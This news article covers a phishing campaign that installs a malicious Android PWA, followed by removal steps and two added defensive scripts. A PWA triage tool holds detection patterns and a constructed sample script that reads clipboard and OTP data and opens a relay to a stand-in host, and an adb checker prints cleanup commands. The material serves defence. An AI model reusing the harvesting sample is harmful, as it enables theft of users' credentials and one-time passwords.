- Attackers are abusing progressive web apps (PWAs) on Android
- Victims are lured through a phishing site, google-prism[dot]com, into installing a malicious PWA
- The PWA collects clipboard contents, crypto wallet addresses, OTPs, GPS data and more
Threat actors have started turning to progressive web applications (PWAs) to do their evil deeds on Android, stealing login credentials, cryptocurrency wallet data, GPS information and more, experts warned.
Security researchers at Malwarebytes recently detailed one such campaign they detected in the wild. It starts with a phishing email that lures people to a fake Google site, google-prism[dot]com.
Under the guise of improving security, victims go through a four-step “security” check that includes the installation of a malicious PWA.
Collecting the data
For those unfamiliar with PWAs, these are websites that can be installed and run like regular apps on the device, but which actually run inside the web browser.
Once installed, the PWA requests permissions to send notifications, access clipboard data, and use other browser functions, and it registers a service worker to enable push notifications, background tasks, and data preparation.
At this point, the malware starts collecting data every time the app is opened. Clipboard contents, cryptocurrency wallet addresses, one-time passwords obtained via the WebOTP API, contacts, GPS data, and device fingerprint details are all collected. But since the information can only be collected while the app is open, the PWA also starts sending push notifications to the victim, prompting them to reopen it.
The PWA also establishes a WebSocket-based relay and HTTP proxy capability, so attackers can route web requests through the device, scan internal networks, and even access local resources.
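The capabilities described above (a service worker handling push events, clipboard reads, WebOTP, geolocation, contacts and a WebSocket relay) all show up as recognisable API calls in a PWA's script and as fields in its web app manifest. The following static triage script is an added example, not Malwarebytes' tooling or anything from the campaign: it takes a manifest and a script source, flags those capabilities with regular expressions (the patterns are assumptions about common API spellings, not signatures), checks whether the manifest's start_url points away from the origin the site claims to be, and produces a rough risk score. The manifest and script below are constructed samples.

```python
"""Static triage of a suspected malicious PWA (added example, not the article's code).

Given a web app manifest and the source of its service worker / main script,
flag the browser capabilities an installed PWA could abuse: push notifications,
clipboard reads, WebOTP, geolocation, contacts, fingerprinting hooks and
WebSocket relays. All inputs below are constructed for the demo.
"""
import json
import re
from urllib.parse import urlparse

# Regex -> capability name. The patterns are assumptions about how the APIs
# are usually spelled in script source; they are not campaign signatures.
CAPABILITY_PATTERNS = {
    "push_notifications": r"addEventListener\(\s*['\"]push['\"]|pushManager\.subscribe",
    "clipboard_read": r"navigator\.clipboard\.read(?:Text)?\(",
    "webotp": r"navigator\.credentials\.get\([^)]*otp",
    "geolocation": r"navigator\.geolocation\.(?:getCurrentPosition|watchPosition)",
    "contacts": r"navigator\.contacts\.select\(",
    "websocket_relay": r"new\s+WebSocket\(",
    "fingerprinting": r"navigator\.(?:hardwareConcurrency|deviceMemory|userAgent)|canvas\.toDataURL",
}

# Capabilities that let a page exfiltrate user data rather than just notify.
RISKY = {"clipboard_read", "webotp", "geolocation", "contacts", "websocket_relay"}

# Constructed sample: a manifest and script mimicking the behaviour the
# article describes, using a reserved .invalid domain rather than a real one.
SAMPLE_MANIFEST = json.dumps({
    "name": "Security Check",
    "start_url": "https://example-phish.invalid/check/",
    "display": "standalone",
})
SAMPLE_SCRIPT = r"""
self.addEventListener('push', e => self.registration.showNotification('Security Check', {body: 'Tap to continue'}));
async function harvest() {
  const clip = await navigator.clipboard.readText();
  const otp = await navigator.credentials.get({otp: {transport: ['sms']}});
  navigator.geolocation.getCurrentPosition(p => send(p));
  const ws = new WebSocket('wss://example-phish.invalid/relay');
}
"""


def triage_pwa(manifest_text: str, script_source: str, expected_origin: str) -> dict:
    """Return the capabilities found, manifest problems and a crude risk score."""
    manifest = json.loads(manifest_text)
    findings = {"capabilities": [], "manifest_issues": [], "notes": []}

    for name, pattern in CAPABILITY_PATTERNS.items():
        if re.search(pattern, script_source, re.S):
            findings["capabilities"].append(name)

    # An absolute start_url on a different origin than the site claims is a red flag.
    start_url = manifest.get("start_url", "")
    parsed = urlparse(start_url)
    if parsed.netloc and f"{parsed.scheme}://{parsed.netloc}" != expected_origin:
        findings["manifest_issues"].append(f"start_url is off-origin: {start_url}")

    # standalone/fullscreen hides the address bar; normal for PWAs, but worth noting.
    if manifest.get("display") in ("standalone", "fullscreen"):
        findings["notes"].append("installs without a visible browser address bar")

    findings["risk_score"] = (len(RISKY & set(findings["capabilities"]))
                              + len(findings["manifest_issues"]))
    return findings


if __name__ == "__main__":
    # expected_origin is a placeholder for the brand the phishing site imitates.
    report = triage_pwa(SAMPLE_MANIFEST, SAMPLE_SCRIPT, "https://accounts.google.example")
    print(json.dumps(report, indent=2))
```

The script only inspects text, so it can be run on files pulled from a suspect site or from a browser's service worker cache without executing any of the code; a high score is a reason to look closer, not a verdict on its own.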
In some cases, Malwarebytes said, the victim is also encouraged to download a “companion app” advertised as a “critical security update” that requests broad permissions and registers as the device’s administrator.
This app, obviously aimed at the most gullible victims, allows for deeper compromise, including SMS interception, keystroke capture via a custom keyboard, notification monitoring, credential theft, and long-term persistence.
If, by chance, you have installed such an application, you can remove it by looking for the “Security Check” entry in the list of installed applications. If your device has an app called “System Service” with the package name com.device.sync, and that app holds device administrator access, first revoke the access by going to Settings – Security – Device Management Apps, and then uninstall it.
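For anyone checking several devices, the same removal steps can be driven over adb. The script below is an added example, not Malwarebytes' or the article's own tooling: it reads the output of `adb shell pm list packages` and `adb shell dumpsys device_policy`, reports whether the com.device.sync package named above is installed and whether it is an active device admin, and prints the adb commands that revoke the admin first and uninstall second, matching the manual order. The two command outputs embedded here are constructed samples; the admin receiver class name in them is invented, and real dumpsys output is longer and varies between Android versions, so the parser only looks for `package/class:` component lines.

```python
"""Check an Android device for the companion app named in the article
(added example, not the article's code). Parses the output of
    adb shell pm list packages
    adb shell dumpsys device_policy
and emits the adb commands that revoke device-admin rights and uninstall.
The sample outputs are constructed stand-ins for a live device.
"""
import re
import subprocess

# Package name taken from the article; the receiver class in the sample is invented.
SUSPECT_PACKAGES = {"com.device.sync"}

SAMPLE_PM = """package:com.android.chrome
package:com.device.sync
package:com.google.android.gms
"""
SAMPLE_DPM = """Current Device Policy Manager state:
  Enabled Device Admins (User 0):
    com.device.sync/.AdminReceiver:
      uid=10234
"""


def installed_packages(pm_output: str) -> set:
    """Package names from the 'package:<name>' lines of `pm list packages`."""
    return {m.group(1) for m in re.finditer(r"^package:(\S+)", pm_output, re.M)}


def active_admins(dpm_output: str) -> dict:
    """Map package -> flattened admin component for each 'pkg/cls:' line."""
    return {m.group(1): f"{m.group(1)}/{m.group(2)}"
            for m in re.finditer(r"^\s*([\w.]+)/(\.?[\w.$]+):\s*$", dpm_output, re.M)}


def assess(pm_output: str, dpm_output: str, suspects=SUSPECT_PACKAGES) -> dict:
    """For each suspect package: is it installed, and which admin component (if any) it holds."""
    pkgs = installed_packages(pm_output)
    admins = active_admins(dpm_output)
    return {p: {"installed": p in pkgs, "device_admin": admins.get(p)} for p in suspects}


def remediation(report: dict) -> list:
    """adb commands in the same order as the manual steps: revoke admin, then uninstall."""
    cmds = []
    for pkg, state in report.items():
        if not state["installed"]:
            continue
        if state["device_admin"]:
            cmds.append(f"adb shell dpm remove-active-admin {state['device_admin']}")
        cmds.append(f"adb uninstall {pkg}")
    return cmds


def adb_shell(*args) -> str:
    """Run an adb shell command and return its stdout (requires a connected device)."""
    return subprocess.run(["adb", "shell", *args], capture_output=True,
                          text=True, check=True).stdout


if __name__ == "__main__":
    try:
        pm_out = adb_shell("pm", "list", "packages")
        dpm_out = adb_shell("dumpsys", "device_policy")
    except (FileNotFoundError, subprocess.CalledProcessError):
        pm_out, dpm_out = SAMPLE_PM, SAMPLE_DPM  # no adb/device: fall back to the sample
    report = assess(pm_out, dpm_out)
    print(report)
    for cmd in remediation(report):
        print(cmd)
```

The commands are printed rather than executed so an analyst can review them first; `dpm remove-active-admin` takes the flattened component string exactly as dumpsys prints it, which is why the parser keeps the package/class form.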
Via BleepingComputer